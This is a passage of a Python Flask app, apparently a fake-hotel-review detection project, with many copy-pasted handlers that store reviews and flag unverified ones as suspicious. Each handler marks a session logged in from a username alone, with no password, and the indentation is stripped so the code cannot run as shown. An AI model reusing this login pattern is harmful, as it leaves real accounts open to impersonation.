mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInMumbai.html')
else:
return render_template('alertmumbai.html')
return render_template('hotelsInMumbai.html')
@app.route("/submitITCM", methods=["GET", "POST"])
def submitITCM():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Mumbai'
hotel = 'ITC'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s, %s,% s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s, %s,% s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s, %s,% s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s, %s,% s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInMumbai.html')
else:
return render_template('alertmumbai.html')
return render_template('hotelsInMumbai.html')
@app.route("/submitMarathaM", methods=["GET", "POST"])
def submitMarathaM():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Mumbai'
hotel = 'Maratha'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s, %s,% s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s, %s,% s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInMumbai.html')
else:
return render_template('alertmumbai.html')
return render_template('hotelsInMumbai.html')
# **************************************** Kolkata***************************************************
@app.route("/submitITCK", methods=["GET", "POST"])
def submitITCK():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Kolkata'
hotel = 'ITC'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInKolkata.html')
else:
return render_template('alertkolkata.html')
return render_template('hotelsInKolkata.html')
@app.route("/submitOberoiK", methods=["GET", "POST"])
def submitOberoiK():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Kolkata'
hotel = 'Oberoi'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s,% s, % s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInKolkata.html')
else:
return render_template('alertkolkata.html')
return render_template('hotelsInKolkata.html')
@app.route("/submitTajK", methods=["GET", "POST"])
def submitTajK():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Kolkata'
hotel = 'Taj'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInKolkata.html')
else:
return render_template('alertkolkata.html')
return render_template('hotelsInKolkata.html')
@app.route("/submitMarriottK", methods=["GET", "POST"])
def submitMarriottK():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Kolkata'
hotel = 'Marriott'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInKolkata.html')
else:
return render_template('alertkolkata.html')
return render_template('hotelsInKolkata.html')
# **************************************** Bangalore***************************************************
@app.route("/submitWelcomHotelB", methods=["GET", "POST"])
def submitWelcomHotelB():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Bangalore'
hotel = 'WelcomHotel'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID,review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInBangalore.html')
else:
return render_template('alertbangalore.html')
return render_template('hotelsInBangalore.html')
@app.route("/submitLeelaB", methods=["GET", "POST"])
def submitLeelaB():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Bangalore'
hotel = 'Leela'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInBangalore.html')
else:
return render_template('alertbangalore.html')
return render_template('hotelsInBangalore.html')
@app.route("/submitConradB", methods=["GET", "POST"])
def submitConradB():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Bangalore'
hotel = 'Conrad'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInBangalore.html')
else:
return render_template('alertbangalore.html')
return render_template('hotelsInBangalore.html')
@app.route("/submitWindsorB", methods=["GET", "POST"])
def submitWindsorB():
if request.method == "GET":
return redirect(url_for('index.html'))
elif (request.method == "POST"):
reviewdata = dict(request.form)
review = reviewdata["Review"]
city = 'Bangalore'
hotel = 'Windsor'
name = reviewdata["Username"]
reviewtype = reviewdata["Reviewtype"]
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE Username like % s', [name])
account = cursor.fetchone()
if account:
session['loggedin'] = True
ip = request.remote_addr
today = date.today()
cursor.execute('SELECT max(review_id) FROM review order by review_id')
max1 = cursor.fetchone()
print(max1)
max1 = int(max1['max(review_id)']) + 1
max1 = str(max1)
cursor.execute(
'INSERT INTO review(review_id,user,hotel,city,reviews,ip_address,today,reviewtype) VALUES (%s,% s, % s, % s, %s, %s, %s, %s)',
(max1, name, hotel, city, review, ip, today, reviewtype))
mysql.connection.commit()
cursor.execute(
'SELECT review_id FROM review WHERE user like %s and hotel like %s and city like %s order by review_id desc',
[name, hotel, city])
row = cursor.fetchone()
reviewID = row['review_id'] # string id
ID = str(reviewID) # int ID
with open('Hotelreview_testingData.csv', mode='a') as csv_file:
data = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data.writerow([ID, review, hotel, city, name])
if reviewtype == 'Room':
cursor.execute(
'SELECT checkInDate FROM book_room WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
ch = cursor.fetchone()
if ch == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s, %s,% s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
checkin = ch['checkInDate']
print(checkin)
checkin1 = datetime.strptime(checkin, '%Y-%m-%d').date()
if checkin1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
elif reviewtype == 'Table':
cursor.execute(
'SELECT date FROM book_table WHERE name like % s and hotel like %s and city_of_hotel like %s',
[name, hotel, city])
da = cursor.fetchone()
if da == None:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s,% s, % s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
else:
datec = da['date']
date1 = datetime.strptime(datec, '%Y-%m-%d').date()
if date1 < today:
print('valid')
else:
print('suspicious')
cursor.execute('INSERT INTO suspicious_reviews VALUES (% s, % s, % s,% s, %s, %s, %s)',
(reviewID, name, hotel, city, review, today, reviewtype))
mysql.connection.commit()
mlmodel.mlmodel()
